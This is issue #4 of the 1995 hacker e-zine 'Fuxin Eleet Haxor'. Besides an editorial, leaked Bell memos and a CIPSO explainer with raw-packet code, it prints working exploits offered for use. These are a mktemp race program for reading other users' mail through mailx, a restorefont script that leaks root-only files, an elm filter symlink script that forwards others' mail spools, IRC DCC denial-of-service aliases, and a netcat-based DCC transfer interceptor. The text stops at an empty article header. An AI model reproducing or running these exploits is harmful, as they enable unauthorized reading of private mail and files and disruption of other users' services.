Copy Link
Add to Bookmark
Report

Fuxin Eleet Haxor 04

eZine's profile picture
Published in 
Fuxin Eleet Haxor
 · 5 years ago

  

/IIIIIIIIII /IIIIIIIII /III /III
\ III_____/ \ III____/ \ III \ III
\ III \ III \ III \_III
\ IIIIIIII \ IIIIIIIII \ IIIIIIIIII
\ III___/ \ III____/ \ III__/ III
\ III \ III \ III \ III
\ III ___ \ IIIIIIIII ___ \ III \ III ___
\__/ /\__\ \/________/ /\__\ \/__/ \/__/ /\__\
\/__/ \/__/ \/__/
ashionably legant ackers

Issue #4
December 26th, 1995

Editor: ReDragon

Official FEH Distribution Sites: ftp.fc.net /pub/defcon/FEH
ftp.2600.com /pub/publications/feh

No More Greetz
(You already know if yer eleet)

FEH #4
The Saga Continues

By all accounts, this is our first issue actually delivered on time, and
what is easily the best one yet. Previous issues I wondered if there was
really a place for FEH, and if I would ever put out another issue. Well,
there is no more wondering, the answer is quite clear. Yes. What made it
to clear in my mind is that this really IS the best voice of hackers out
there. The yardstick by which many zines are judged is phrack. This isn't
phrack. And I don't want it to be. Erik Bloodaxe, despite all the best
intentions on his part, has run phrack into the ground, and it is time to
lay it to rest, and to let the hackers move on. And so, where will you find
the hearts of real hackers, what puts a smile on the face of the real hackers,
where the pulse of the hacker community lies. It is here, it is FEH.
-ReDragon


<---------------------------------------------------------------------------->

Table of Contents

General Stuff:
Intro
Table of Contents
/var/spool/mail/feh

Technical Articles:
A Guide to CIPSO by Mythrandir
Linux 'mail-x' Security Holes by FEH Staff
Linux 'restorefont' Security Holes by FEH Staff
Linux 'filter' Security Holes by FEH Staff
IRC DCC Protocol Security Holes by FEH Staff
Example Packet Construction Code by SnoNinja

Serious Articles:
Breakfast with the Secret Service by Kamakize
Some Thoughts on Hacking by Mythrandir
Gray Areas: Who's on your side? by FEH Staff

Entertaining Articles:
#hack Quotes by SnoNinja
The Word List by Allen 3. Smith
Macs vs. PCs by nicotine
Haxoring an ATM Machine by shadow tao
Department Store Paging by Tele Monster
The Tales of Oof by t3
The Elite Speak Filter by SnoNinja
DefCon Reviews and Other Thoughts by Zeed


<---------------------------------------------------------------------------->
/var/spool/mail/feh


To: All XXXXX Bell Employees

The Corporate Information Security organization would like to take
this opportunity to remind everyone that the Holiday season is when
computer hackers usually take opportunities to attempt to `break into'
computer systems. During this time, employees take vacations and
fewer people are present in buildings to watch computer systems which
allow hackers more time to attempt their tricks. We would ask that
each employee who is responsible for a computer system (yes, this
includes that personal computer on your desktop, as well as those
multi-user systems) to take precautions to insure no unauthorized
person has the ability to access the computer system and the
information on the system.

For employees with a personal computer:
if possible, turn it off and use the key to lock the system. make
certain start-up passwords are active (e.g., LOCKIT, XLOCK). put
software and data diskettes in a secure (locked) location. turn off
any modem attached to the PC. perform a routine backup.

For system administrators with mid-range computers:
change the `root' password at the console. insure audit logs are
working properly. take a system backup. for those systems with
SysGuard installed, insure detective tools are working as expected.
upon return from holiday, review the audit logs for unsuccessful login
attempts, usage of `root' userid, and any other suspicious activity.

For all employees:
remember, hackers try to use social engineering to convince you to
give them information they shouldn't have. upon return from holiday,
check the `last login' message for each system to make certain it is
the last time you accessed it.

This advisory is not meant to be an answer for every possible security
precaution, but a reminder that securing company resources is the
responsibility of every employee and should be treated as a part of
each person's job. Contact the Computer Security Administration Group
at (xxx) xxx-xxxx with questions or for assistance.

---

"Nation-wide callerid went into effect on December first. As you are
aware, FCC rules calling for nation-wide delivery of calling party number
information went into effect. For some unexplained reason, Bell South
test calls indicate that long distance carriers are not passing calling
party number information. Bell South is in the process of contacting
each carrier to ask for explanations and corrective actions. Until we
have more information, there seems to be no point in referring the
complaining custumers to the carriers. The following verbage should be
used to state out position on this matter to complaining coustumers:
'Bell South network is fully compliant with the FCC order and will
deliver the calling party number both to and from long distance
carriers. We are working with carriers in those instances where the
calling party number is not being delivered to identify problems and to
ensure full compliance with the FCC order.'"


<---------------------------------------------------------------------------->

A Guide to the Common Internet Protocol Security Option
by Mythrandir (mythrndr@infonexus.com)

Some of you may have noticed that not all networks or operating systems
respond to the reception of common IP packets anymore. In the struggle to
maintain a secure network, recent innovations have been made in the area of
trusted systems. Trusted systems can maintain and ensure that access to
different classifications of data is properly restricted.
One method of maintaining this access control over a network is the common
internet protocol security option (CIPSO). CIPSO allows hosts to communicate
data in a generic manner so that its security levels and methods of handling
can be understood by other machines. Hosts with different internal
implementations of a trusted environment can still interact over the network
and maintain their levels of security via CIPSO.
CIPSO is implemented by creating a new IP option (RFC 791). This option
will allow both the kernel and the user (dependant on implementation) to add
the option and thus specify the security level of a packet.

The basic format of a CIPSO option in an IP packet is as follows:

+-------------------------------------------------------------------------+
| OOOOOOOO | LLLLLLLL | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD | TTTTTTTT... |
+-------------------------------------------------------------------------+
Option Length Domain of interpretation Tag Information
Number
1 Byte 1 Byte 4 Bytes (Long) >= 4 Bytes

The option number is a one octet number. This should be 134D.

The length field specifies the length in bytes of the entire cipso option.
This includes the header information (option, length, doi) as well as the tag
information. This number cannot exceed 40 due to ip header length restrictions.

The domain of interpretation is a 4 octet number. This number specifies which
type of security interpretation should be used. A host will check if it
understands this number before it accepts a packet.

+-------------------------------------------------------------------------+
| tttttttt | llllllll | iiiiiiiiiiiiiiiiiiii.... |
+-------------------------------------------------------------------------+
Tag Type Length Tag fields
1 octet 1 octet variable

Tag type is a one octet number which specifies the format of the tag.
The numbers 1 - 127 are reserved for standard tag definitions. 128-255 can
be assigned by a DOI authority. This is simply a local network definition.

Length is a one octet number which specifies the length of the tag. This
includes the tag type, length field, and the tag fields. This number cannot
exceed 34, again for reasons due to the ip header length restriction of 60
bytes.

A standard tag type. (very common)

Tag Type 1

+-------------------------------------------------------------------------+
| AAAAAAAA | SSSSSSSS | BBBBBBBBBBBBBBBBBBBBB....... |
+-------------------------------------------------------------------------+
Alignment Sensitivity Bit map of categories
1 octet 1 octet variable

The alignment field is a 1 octet number. It is always set to zero. Its
purpose is to simply align the bit map along an even boundary.

The sensitivity field is a 1 octet number which specifies the sensitivity
level of the data. This could represent classified, secret, top secret, etc..

The bit map is a variable length field which can be from 0 to 30 bytes long.
This is used to contain more specific sensitivity information on a segment
of data. This is implementation specific.

The packet level implementation is very straightforward, and can be used
in a wide variety of ways to control the data contained in the packets.
The first is to only allow certain levels of sensitivity to pass through
specific interfaces. In other words, you can configure it to handle multiple
interfaces and pass top secret data through one interface and unclassified
data through a different network interface. Or you could make a card allow
unclassified data through, and reject passing of any classified data into an
unclassified network. This allows filtering based on the sensitivity of data.
The important point to note here is that filtering takes place at the kernel
level, NOT the user level.
Also, CIPSO can be used so that when a host passes a piece of data across
the network, the other host will assign the correct level of security to a
data stream. The host can then assure that only authorized users can access
the data that they are cleared for.

And now that you've found it, what do you do? Well first off you should
sit back and watch the network. Try and determine which machines allow what
types of sensitivities. This is important so you will know what types you can
send to specific machines. It is also important to note the tags that are
sent with the classifictions so that they are placed within the packets.
In order to get at sensitive data you will probably have to gain access to
send raw packets to the local network. At this point you will have to generate
raw ip packets which contain the CIPSO option in the header. This could be
incorporated in a telnet client. This will allow you to connect to the other
machines on the network assuming that you use the correct classification and
tag fields.

Now for the Code...

The first program will allow you to create a ECHO REQUEST ICMP packet with
a CIPSO option inside of it. This code is meant to be a base to write
something more interesting with. There are two files, cipso.h and cipso_ping.c
just type gcc -o cping cipso_ping.c and run as root and then you are set.
This code was written on a linux box, but should be fairly portable to other
machines. Also, if you want to spoof your source address then you will
have to use the IP_HDRINCL socket option, which requires you to patch the raw.c
file if you are using a linux kernel.
Finally, for your listening pleasure, I've left a little snipet of code that
will listen for ICMP packets. It will simply print out the hex data of any
ICMP packets it receives. gcc -o ilisten icmp_listen.c and go..
This is also a great piece of code to use as a base for something more
interesting..

Best of Luck!

Mythrandir

Ways to Improve this Code:
Fix ilisten so the complete packet information is printed out.
Print out the entire ip header
the ip option
the icmp header
and the data
all in a nice neat form.

Be Elite! Use your Own Code!

--------- cipso.h ------ cut here ------
/*
* CIPSO structures
* By, Mythrandir
*/


struct cipso_opt {
u_char option_num; /* Option number - should be 134 */
u_char length; /* length - cannot exceed 40 */
u_long doi; /* Domain of Interpretation - 4 bytes, a u_long */
u_char tag_data[1]; /* Tag data pointer */
};

struct cipso_tag_type1 {
u_char type; /* Will be set to 1 */
u_char length; /* length - cannot exceed 34 */
u_char alignment; /* Alignment octet - always 0 */
u_char sensitivity; /* sensitivity label */
u_char bitmap[1]; /* tag fields */
};

------ end of cipso.h ----- cut here ------

------ cipso_ping.c ------ cut here -------

/*
* CIPSO Ping
* This program demonstrates a simple method of creating a
* cipso echo request packet. This is meant to a base to write
* other far more useful programs such as a cipso telnet client
* or whatnot.
* Remember, you may need to modify the sensitivity and the
* bit map in order to get it to work correctly with a machine.
* 1995 - Mythrandir
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <netdb.h>
#include <stdio.h>
#include "cipso.h"

#define DATA "FEH Greetz your system."
#define DATA_SIZE sizeof(DATA)
#define LOCAL_HOST "127.0.0.1"
#define DOI 0x12345678
#define TAGBITMAP "123456789012345678901234567890"
#define BITMAPSIZE 30
#define SENSITIVITY 1

/*
* Data alignment numbers
*/

#define IP_START 0
#define CIPSO_START 20
#define ICMP_START 64
#define DATA_START 72

#define MAXHOSTNAMELEN 64
#define MAXPACKET 4096

struct sockaddr_in whereto;

in_cksum(unsigned short * addr, int len)
{
register int nleft = len;
register unsigned short *w = addr;
register unsigned short answer ;
unsigned short odd_byte = 0;
register int sum = 0;

while(nleft > 1)
{
sum += *w++;
nleft -= 2;
}

if(nleft == 1)
{
*(unsigned char *)(&odd_byte) = *(unsigned char *) w;
sum += odd_byte;
}

sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return answer;
}


main(int argc, char *argv[])
{
char **av = argv;
unsigned char packet[MAXPACKET];
int options;
int ntransmitted = 0;
int ident = getpid() &0xFFFF;

int sock;
struct sockaddr_in *to = (struct sockaddr_in *) &whereto;
struct sockaddr_in from;
struct hostent *hp, *gethostbyname();
char *hostname;
char hnamebuf[MAXHOSTNAMELEN];

/* variables for doing a ping packet */
unsigned char outpack[MAXPACKET];
struct iphdr *ip = (struct iphdr *) &outpack[IP_START];
struct cipso_opt *cipso = (struct cipso_opt *) &outpack[CIPSO_START];
struct cipso_tag_type1 *tag1 = (struct cipso_tag_type1 *) cipso->tag_data;
struct icmphdr *icp = (struct icmphdr *) &outpack[ICMP_START];
int i;
unsigned char *datap = &outpack[DATA_START];

/*
* force user to enter host
*/


if(argc < 2)
{
printf("%s: <hostname>\n", argv[0]);
exit(1);
}


/*
* Initialize everything
*/


bzero( (char*) &whereto, sizeof(struct sockaddr) );
to->sin_family = AF_INET;
to->sin_addr.s_addr = htonl(inet_addr(av[1]));


if(to->sin_addr.s_addr != -1)
{
strcpy(hnamebuf, av[1]);
hostname = hnamebuf;
}
else
{
hp = gethostbyname(av[1]);
if(hp)
{
to->sin_family = hp->h_addrtype;
bcopy(hp->h_addr, (caddr_t)&to->sin_addr, hp->h_length);
hostname = hp->h_name;
}
else
{
fprintf(stderr, "%s: unknown host %s\n", argv[0], av[0]);
exit(1);
}
}


/*
* Open a Socket
*/


sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

if(sock < 0)
{
printf("Error: Cannot Open RAW IP socket\n");
exit(1);
}

printf("Opened RAW Socket\n");

/*
* Set up IP Header
*/


ip->ihl = 15; /* set to 15 to include option in header */
ip->version = 4;
ip->tos = 0;
ip->tot_len = DATA_START + DATA_SIZE;
ip->id = 0;
ip->frag_off = 0;
ip->ttl = 255;
ip->protocol = 1; /* ICMP Protocol */
ip->check = 0;
ip->saddr = inet_addr(LOCAL_HOST); /* Thanks to linux this means nothing. YET */
ip->daddr = inet_addr(av[1]);

/*
* Set up Cipso Header
*/


cipso->option_num = 134;
cipso->length = 40;
cipso->doi = DOI;

/*
* Set up cipso tag data
*/


tag1->type = 1;
tag1->length = 34;
tag1->alignment = 0;
tag1->sensitivity = SENSITIVITY;
strncpy(tag1->bitmap, TAGBITMAP, BITMAPSIZE);


/*
* Set up ICMP Header
*/


icp->type = 8;
icp->code = 0;
icp->checksum = 0;
icp->un.echo.sequence = ntransmitted++;
icp->un.echo.id = ident;


/*
* Compute ICMP checksum
*/


icp->checksum = in_cksum(icp, 8 + DATA_SIZE);

/*
* Compute IP checksum

ip->check = in_cksum(ip, DATA_START + DATA_SIZE);

/*
* sendto(s, msg, len, flags, to, tolen)
*/



i = sendto(sock, outpack, DATA_START + DATA_SIZE, 0, &whereto, sizeof(struct sockaddr));

close(sock);
exit(0);
}

--------- end of cipso_ping.c ------- cut here -------

------- icmp_listen.c ------- cut here -------

/*
* Ping watch - A very very rough ICMP packet watcher
* Simply displays hex values of packet
* by, Mythrandir
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>

main()
{
int l, i, j;
int sock, length;
struct sockaddr_in name;
char buf[1024];

sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);

if (sock < 0)
{
printf("Cannot open Raw ICMP Socket.\n");
exit(1);
}

name.sin_family = AF_INET;
name.sin_addr.s_addr = INADDR_ANY;
name.sin_port = 0;

if (bind(sock, (struct sockaddr *) &name,
sizeof name ) < 0)
{
printf("Error binding ICMP socket");
exit(1);
}

length = sizeof(name);

if (getsockname(sock, (struct sockaddr *) &name, &length) < 0)
{
printf("Error: Can't get socket name\n");
exit(1);
}

printf("Socket port #%d\n", ntohs(name.sin_port));

for( ; ; )
{
if ((l = read(sock, buf, 1024)) < 0)
printf("Error receiving ICMP packet\n");


/*
* Print out IP information
*/


printf("Got ICMP Packet From: %d.%d.%d.%d\n", buf[12] & 0xff, buf[13] & 0xff, buf[14] & 0xff, buf[15] & 0xff);
printf("Got ICMP Packet To: %d.%d.%d.%d\n", buf[16] & 0xff, buf[17] & 0xff, buf[18] & 0xff, buf[19] & 0xff);

/*
* Print IP Data
*/


for(i = 0; i < (l - 4); i += 16)
{
for(j = 0; j < 16; j++)
if((buf[i + j] & 0xff) < 16)
printf("0%x ", buf[i + j] & 0xff);
else
printf("%x ", buf[i + j] & 0xff);
printf(" ");
for(j = 0; j < 16; j++)
if((buf[i + j] < 33) || (buf[i + j] > 126))
printf(".");
else
printf("%c", buf[i + j]);
printf("\n");
}

fflush(stdout);

}

close(sock);
exit(0);
}

---------- end of icmp_listen.c ------- cut here --------

<---------------------------------------------------------------------------->

Linux 'mailx' Security Holes
by FEH Staff


There is a problem prevalent in the way many programs implement their
usage of mktemp() in order to create temporary files in /tmp, allowing users
on a machine to read and write to the contents of temporary files created.
The basic problem is that there is a race condition that exists between
the point that a program calls mktemp(), and the pathname returned by mktemp
is actually created. For some programs, the file creation is immediately
or almost immediately following the mktemp(), resulting in an extremely
small window of opportunity, and as a result making it very difficult to
exploit. However, there are other programs that do not immediately open
the file, and in these cases it is only a matter of getting the timing
right in order to exploit the hole.
To exploit this hole, simply create the file that mktemp() returns as
a valid temporary filename after mktemp() has been called, but before the
file has been opened, allowing the user running the program permissions to
read and write from that temporary file. The program will then succeed in
an fopen, and will write to the file, oblivious to the fact that it didn't
actually create the file, and that others can also read and write from the
file.
Note that most programs will immediately unlink() a temporary file, but
that does not delete it until after it is closed. Closing a file results in
the contents of it being flushed, and so by using a 'tail -f' or a similar
procedure, you can capture the contents of the file before it is removed
from the filesystem.
The filename returned by mktemp() is easily determined for most unix
platforms, allowing this bug to be exploited. For the linux libc, this is
to replace the X's in the template with the leftmost digit starting at 'a',
and then being incremented 'a'-'z', 'A'-'Z', and '0'-'9' (if that file
already exists), and then replacing the rest of the X's with the process id
(0 padded). Other operating systems use a variation of this technique,
experimentation easily reveals the algorithm.
The generic procedure used to formulate an exploit for a particular program
with this bug is as follows:
1. detect the execution of the program.
2. determine the temporary filename that mktemp() will return
when called by the program.
3. determine the point at which mktemp() is called by the program,
and immediately following that point, create the file, with
rw permissions for the user who is running the program.
4. read the contents of the temporary file, using a 'tail -f' or
your own routines.
5. if the sticky bet is set on /tmp, clean up your mess by rm'ing
the temp file you created, since the unlink() called by the
actual program will fail if you are the owner.

Linux's /bin/mail, as included in Slackware 3.0 (mailx 5.5), suffers
from this mktemp() problem in all temporary files it creates. It uses 5
temporary files with filenames generated during the program's initialization
in a tinit() function, and then uses them as it becomes necessary during the
program's execution. The race condition begins in this tinit() function.
The temporary files that can be exploited are as follows:
/tmp/ReXXXXXX
Used when a user selects 'e' from the mailx command prompt, to edit
mail. The message the user has selected to edit is copied to the
temporary file at this point, and then the editor is invoked on that
temp file. The race condition ends when the user has selected 'e',
and allows the mesage being edited to be read.
/tmp/RsXXXXXX
Used when a user sends mail, usually from the command line, such as:
'mail dave'. The race condition ends when EOF is recieved from stdin,
and the message is about to be sent, and allows the outgoing mail to
be read.
/tmp/RqXXXXXX
Used when mail arrives into the mail spool while mail is currently
running. The race condition ends when the program is preparing to
shutdown, and allows the new contents of the mail spool to be read.
/tmp/RmXXXXXX
Used to prepend a message to the user's mbox file. Prepending
requires the entire mbox contents to be read to the temporary file
and then appened to the new message(s) being added to the file.
This is disabled by default in Slackware 3.0 in the /etc/mail.rc
by the use of the set append option. For this to be useful, that
option needs to be removed from /etc/mail.rc, or an unset append
needs to be added to the user executing mail's .mailrc file. The
race condition ends when the program is preparing to shutdown
/tmp/RxXXXXXX
Used to read messages from the user's mail spool. The race condition
ends during the program's startup, when the mail spool is read, and
allows any new mail in the user's spool to be read. Because there
is no user input between tinit() and this point, it is the only
race condition that isn't completely trivial to exploit.

The exploit that follows demonstrates the flaws in all but the final
temporary file. To use, wait for a mail process to execute, then call the
mailbug program with the process id as an argument, and finally execute a
tail -f /tmp/R*, and let it run until the mail program has terminated
execution.
As an aside, there are a number of programs that are vulnerable to a
directed denial of service attack preventing people from using them by
creation of the 62 temporary files that are attempted to be used by mktemp(),
resulting in the failure of the program to run. By continous running of a
program watching for these vulnerable programs to start, they can be prevented
from ever successfully executing (one such example of this is in.pop3d, which
would allow a denial of service attack against a specific user from recieving
mail through pop).

Program: mailx-5.5 (/bin/mail)
Affected Operating Systems: linux - Slackware 3.0, others with mailx-5.5
Requirements: account on system, user using /bin/mail
Temporary Patch: chmod o-x /usr/bin/Mail (ie: use something else)
Security Compromise: any user with an account can read incoming, edited,
or outgoing mail if the mail is processed by mailx.
Synopsis: The predictability of mktemp() is exploited to
create the temporary files after the filenames
have been determined but before they are actually
created, allowing the mail being dumped to those
temporary files to be read by the creator of the
files.

mailbug.c:
/* This program creates temporary files used by mailx (/bin/mail under
Slackware 3.0), which can then be read by the program. This will
exploit 4 of the 5 temporary files, the final temporary file is a
tighter race condition, and is not handled by this code.
Following execution of this program with the process id of mail that
is running, execute 'tail -f /tmp/R*', redirecting to a file if desired,
and allow it to run until the mail process has exited. This can be easily
handled in a shell script, but is not included since it is not needed to
sufficiently demonstrate the security flaw.

*/


#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

void exploit_mktemp(char *dest, char *prepend, char *pid)
{
int i;

strcpy(dest,prepend);
for(i=strlen(pid);i<6;i++)
strcat(dest,"0");
strcat(dest,pid);
dest[strlen(prepend)] = 'a';
}


main(int argc, char **argv)
{
char tmpf[5][80]; /* hold filename */

umask(0);

if(argc<2)
{
printf("mailbug racer\nSyntax: %s process-id\n",argv[0]);
return -1;
}

/* get mktemp filenames */
exploit_mktemp(tmpf[0],"/tmp/Re",argv[1]);
exploit_mktemp(tmpf[1],"/tmp/Rs",argv[1]);
exploit_mktemp(tmpf[2],"/tmp/Rq",argv[1]);
exploit_mktemp(tmpf[3],"/tmp/Rm",argv[1]);


/* create temporary files */
creat(tmpf[0],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
creat(tmpf[1],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
creat(tmpf[2],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
creat(tmpf[3],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

}





<---------------------------------------------------------------------------->

Linux 'restorefont' Security Holes
by FEH Staff

Linux's svgalib utilities, required to be suid root, have a problem in that
they do not revoke suid permissions before reading a file. This is exploited
in the restorefont utility, but similar bugs exist in other svgalib utilities.
The restorefont utility serves two functions. First, it will read a font from
a file and write it to the console as the font. Second, it will read a font
from the console and write it out to a file. Luckily, the specific bug
in restorefont can only be exploited if someone is at the console, reducing
its overall impact on the security of the system as a whole.
In writing the utilities, the authors are cognizant of the fact that when
writing out the font, suid permissions must first be given up; it is in fact
commented as such in the code. However, when reading in a font, the program
is still running with full suid root permissions. This allows us to read in
any file for the font that root could access (basically, anything).
The applicable code to read in the file is shown below:

#define FONT_SIZE 8192
unsigned char font[FONT_SIZE];

if (argv[1][1] == 'r') {
FILE *f;
f = fopen(argv[2], "rb");
if (f == NULL) {
error:
perror("restorefont");
exit(1);
}
if(1!=fread(font, FONT_SIZE, 1, f))
{
if(errno)
goto error;
puts("restorefont: input file corrupted.");
exit(1);
}
fclose(f);

We can see from this that the file to be read in has to be at least 8k,
as if it is not, the program will produce an error and exit. If the file
is at least 8k, the first 8k are read into the buffer, and the program
proceeds to set whatever the contents of the file are to the font:
vga_disabledriverreport();
vga_setchipset(VGA); /* avoid SVGA detection */
vga_init();
vga_setmode(G640x350x16);
vga_puttextfont(font);
vga_setmode(TEXT);

At this point, the console will now look quite unreadable if you are
reading something other than a font from that file. But, the data that
is put into the font is left untouched and is readable using the -w option
of restorefont. We then read the font back from video memory to a new file,
and our job is complete, we have read the first 8k of a file we shouldn't
have had access to. To prevent detection of having run this, we probably
shouldn't leave an unreadable font on the screen, so we save and then restore
the original font before reading from the file.
The complete exploit is shown below:

Program: restorefont, a svgalib utility
Affected Operating Systems: linux
Requirements: logged in at console
Security Compromise: user can read first 8k of any file of at least
8k in size on local filesystems
Synopsis: restorefont reads a font file while suid root,
writing it to video memory as the current vga
font; anyone at console can read the current
font to a file, allowing you to use video memory
as an 8k file buffer.

rfbug.sh:
#!/bin/sh
restorefont -w /tmp/deffont.tmp
restorefont -r $1
restorefont -w $2
restorefont -r /tmp/deffont.tmp
rm -f /tmp/deffont.tmp



<---------------------------------------------------------------------------->

Linux 'filter' Security Holes
by FEH Staff

The elm filter under linux runs sugrp mail, thus allowing it to freely
read and write from users mail spools. It is only through the integrity
of its code that the security of linux's mail system is protected; and in
this respect it falls short. In FEH #2, we printed mail-clobber, code
that exploited filter in order to destroy a user's mail spool. But, the
capabilities to exploit filter extend beyond destruction of a mail spool,
you can also use it to read a mail spool.
The specific problem that is exploited in this hole is the way filter
uses a temporary file to store the input to it, and then subsequently send
it back out according to the filter. Because of the modularity of the
coding, in the main filter.c, the temporary file is opened, and then written
to; after which it is closed. The mailmessage function is then called, with
the purpose of forwarding that mail, written to the temporary file, to
whatever destination is specified in the filter. At the start of this
process, the temporary file is opened, and the contents of it are dumped
to the mail spool of the user the mail is being forwarded to.
At any point after the file has been initially opened by the main filter
function, since the user running filter has permissions on that temp file,
it can be rm'd. The temp file existing can then be replaced with a symbolic
link to any file that group mail has read permissions on. When it is opened
in the mailmessage function, the symbolic link is followed and whatever file
that was pointed to will be read in, and the contents forwarded to the user
specified in the mail spool.
The complete exploit is shown below:

Program: filter, an elm utility
Affected Operating Systems: linux
Requirements: account on machine
Security Compromise: user can read any mail spool readable by grp mail.
(usually everything, sometimes not root)
Synopsis: filter writes out the mail to be forwarded to a
temporary file, which is then closed and reopened;
if when the temporary file is reopened it is a
symlink to a mail spool, filter will proceed
to forward the contents of that file as if it was
the original message.

fread.sh:
#!/bin/sh
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
echo From: ReDragon > /tmp/fread-msg.tmp
echo To: $LOGNAME >> /tmp/fread-msg.tmp
echo Subject: Filter Exploit >> /tmp/fread-msg.tmp
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=




<---------------------------------------------------------------------------->

IRC DCC Protocol Security Holes
by FEH Staff


DCC is the IRC client-side protocol used to send information directly
between clients. Normally, when a message is sent between 2 users, it goes
from the user's client to the irc server that client is connected to, then to
the server the reciever is connected to, and finally to the user. Obviously
that is a lot of wasted bandwidth compared to sending information directly
between two clients, thus DCC is used.
DCC is among the simplest of setups for communication, consisting merely of
a tcp connection between two computers, across which data is passed. Since
error correction, flow control, etc. are already handled by the tcp protocol,
there is no need to worry about any such issues.
When you initiate a dcc send, a number of things happen:
1. Your irc client opens an unpriviledged tcp port (>1024), and listens
for an incoming connection.
2. Your irc client sends:
A) The file name
B) Your ip address
C) The number of the tcp port it is listening on
D) The size of the file you are sending (in bytes)
3. The remote irc client then opens a tcp connection to the specified
ip address, transmits a bit of garbage to initiate the transfer, and
dumps whatever is sent over that tcp port to a file.
4. At the time the first connection to the tcp port is established,
your irc client stops listening for new connections, and dumps the
file over the now-established tcp connection.

What you can do with this:
The simplest uses of this setup are denial-of-service attacks. Some IRC
clients (ircII earlier than 2.8.2 and Homer) hang while trying to establish a
dcc connection. Thus, by placing the ip address of a nonexistant machine in
your dcc send request, you can cause the irc client of a user who chose to get
the file to hang long enough to cause a ping timeout. (Note for readability,
the actual control characters in this script have been replaced with ascii
representations, to actually execute convert accordingly).

dcckill.irc:
echo Loading DCC KILL
echo Syntax: DCCK nick filename size
echo ^Bfilename^B and ^Bsize^B are bogus values.
alias DCCK {
^assign dcc_killing 0
//quote PRIVMSG $0 :^ADCC SEND $1 12341234 4321 $2^A
echo *** Sent DCC KILL request to $0
^assign dcc_killing 1
}
--- cut here ---

A similar trick, less damaging, but quite capable of confusing the hell
out of a lot of people is to direct remote irc clients to connect to the
chargen port of some machine on a T3. (Note that ircII will not connect
to a priviliged port, although all of the GUI clients I have tested
will) You can thus use somebody else's bandwidth to dump garbage to a
remote machine.

dccchargen.irc:
echo Loading DCC CHARGEN
echo Syntax: DCCCHARGEN nick filename size
echo ^Bfilename^B and ^Bsize^B are bogus values.
alias DCCCHARGEN {
^assign dcc_charging 0
//quote PRIVMSG $0 :^ADCC SEND $1 2230084270 19 $2^A
echo *** Sent DCC CHARGEN request to $0
^assign dcc_charging 1
}


Aside from denial of service attacks, the primary interesting thing you
can do is intercept dcc file transfers. Becuase ircII listens for
incoming connections from ANY machine when you do a dcc send, all that is
needed is to open a tcp connection to the appropriate port (using netcat
for example), dump a few garbage characters to initiate the transfer, and
then store whatever comes across the tcp connection in a file. You lose
the filename, but for those who are willing to take a hex editor to the
first few bytes of what they get, figuring out what the file format is
should be no problem.
The simplest way to determine which port a dcc transfer is going to be on
is if you have user access on the machine. If you watch for new listens on
ephemeral ports (using netstat or equivalent), you can then quickly open them,
before the actual recipient has a chance to do so.
Here is a quick linux-only program to parse the output of netstat -a, and
dump the contents of whatever dcc sends start from the local machine to a
file.

dccgrab.c:
/* dccgrab 0.01 */
/* A quick program to intercept dcc sends. */
/* Obviously, don't use this without appropriate permission. */
/* Requires that a copy of netcat be in the path, and a copy of */
/* netcat's telnet.d file needs to be in the current directoyr */
/* output will be written to snagfile */
/* known bugs: bot detection should be improved */
/* Only works with linux netstat */

#include <stdio.h>
#include <string.h>

#define TRUE 1
#define FALSE 0

int main (){
int SnaggedOne;
FILE *f;
char NetstatLine [1024];
char CommandString [1024];
char *colin = ":";
char *tempstr;
int port;
int i;

port=1;
SnaggedOne=FALSE;

while (!SnaggedOne){
system ("netstat -a |egrep LISTEN |egrep ':' >/tmp/.dcc2345");
f=fopen ("/tmp/.dcc2345","rt");
if (f==NULL) {
fprintf (stderr,"Unable to open file!");
exit (1);
}

port =0;
while (port == 0) {
fgets (&NetstatLine[0],1024,f);
tempstr = strstr (&NetstatLine[0],colin);
tempstr += sizeof (char);
sscanf (tempstr,"%d ",&port);

/* let's deal with ports we don't want to touch */
if (port < 1024) /* priviledged */
port=0;
if (port == 6000) /* X */
port=0;
if (port == 8080) /* proxy servers */
port=0;
/* bots... */
if (port == 2222)
port=0;
if (port == 3333)
port=0;
if (port == 4444)
port=0;
if (port == 5555)
port=0;
if (port == 6666)
port=0;
if (port == 7777)
port=0;
if (port == 8888)
port=0;
if (port == 9999)
port=0;
if (feof (f))
port=-1;
}

fclose (f);
if (port >0) {
SnaggedOne=TRUE;
printf ("snagging something from port %d\n",port);
sprintf (&CommandString[0],"nc 127.0.0.1 %d < ./telnet.d > snagfile",port);
system (CommandString);
}
else sleep (1);
} /* while !snaggedone*/
return 0;
}

This is obviously not the optimal solution for stealing dcc transfers, and
only works locally, but it provides a good basis for working on your own code
to improve upon.
If you can determine which port the kernel on a remote system assigned
last, you stand a good chance at guessing the port number for the next dcc
send, simply becuase most kernels assign tcp ports in increasing order. Thus,
if you can get a bot to dcc chat you, and you record the port number, and then
bombard the next 30 or so tcp ports with attempted connections, you stand a
very good chance at getting the next file that that bot happens to send
somebody. Actual implementation of this is left as an exercise to our readers.
Good Luck!

<---------------------------------------------------------------------------->

Example Packet Construction Code
by SnoCrash
